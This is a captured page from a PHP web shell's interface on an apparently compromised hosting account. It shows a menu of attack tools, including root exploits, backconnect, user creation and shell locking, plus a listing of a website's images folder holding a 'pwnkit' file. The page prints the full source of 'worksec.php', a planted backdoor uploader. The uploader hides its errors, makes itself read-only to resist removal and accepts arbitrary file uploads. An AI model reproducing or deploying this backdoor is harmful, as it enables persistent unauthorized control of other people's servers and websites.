Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
123click /
assets /
images /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
ab1.jpg
19.13
KB
-rw----r--
ab2.jpg
19.14
KB
-rw----r--
afrikavio.jpg
321.91
KB
-rw----r--
android.png
2.44
KB
-rw----r--
angular-icon.svg
749
B
-rw----r--
angular.png
11.19
KB
-rw----r--
apple.png
3.91
KB
-rw----r--
bg.jpg
110.03
KB
-rw----r--
bg1.jpg
150.2
KB
-rw----r--
bg2.jpg
125.64
KB
-rw----r--
bg3.jpg
709.09
KB
-rw----r--
bg4.jpg
140.04
KB
-rw----r--
bg5.jpg
192.82
KB
-rw----r--
c1.jpg
19.75
KB
-rw----r--
c2.jpg
18.1
KB
-rw----r--
c3.jpg
3.12
KB
-rw----r--
contact-sec.jpg
65.98
KB
-rw----r--
css.png
2.67
KB
-rw----r--
css3.png
7.83
KB
-rw----r--
drupal.png
10.1
KB
-rw----r--
favicon2.png
1.54
KB
-rw----r--
genieprevention.jpg
248.96
KB
-rw----r--
genieprevention.png
1.17
MB
-rw----r--
grid1.jpg
38.97
KB
-rw----r--
html.png
5.46
KB
-rw----r--
java.png
4.4
KB
-rw----r--
joomla.png
10.45
KB
-rw----r--
js.png
5.5
KB
-rw----r--
logo2.png
2.94
KB
-rw----r--
logowhite.png
4.46
KB
-rw----r--
magento.png
58.56
KB
-rw----r--
mysql.png
5.09
KB
-rw----r--
node.png
55.6
KB
-rw----r--
node2.png
30.23
KB
-rw----r--
odfiafrica.jpg
415.24
KB
-rw----r--
p1.jpg
241.53
KB
-rw----r--
p2.jpg
283.06
KB
-rw----r--
p3.jpg
287.65
KB
-rw----r--
p4.jpg
394.63
KB
-rw----r--
p5.jpg
179.35
KB
-rw----r--
p6.jpg
601.42
KB
-rw----r--
php.png
4.76
KB
-rw----r--
prestashop.png
9.34
KB
-rw----r--
ptitsanes.jpg
232.94
KB
-rw----r--
ptitsanes.png
1.11
MB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
python.png
10.26
KB
-rw----r--
royalkarukera.jpg
328.53
KB
-rw----r--
royalkarukera.png
1.47
MB
-rw----r--
royalkarukerda.jpg
324.45
KB
-rw----r--
shopify.png
311.75
KB
-rw----r--
sprite.png
2.56
KB
-rw----r--
sulycast-theme.jpg
348.71
KB
-rw----r--
tab1.jpg
32.21
KB
-rw----r--
tab2.jpg
41.63
KB
-rw----r--
tab3.jpg
21.34
KB
-rw----r--
team1.jpg
9.5
KB
-rw----r--
team2.jpg
17.36
KB
-rw----r--
team3.jpg
18.25
KB
-rw----r--
windows.png
1.71
KB
-rw----r--
wordpress2.png
7.21
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worksec.php
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>
Close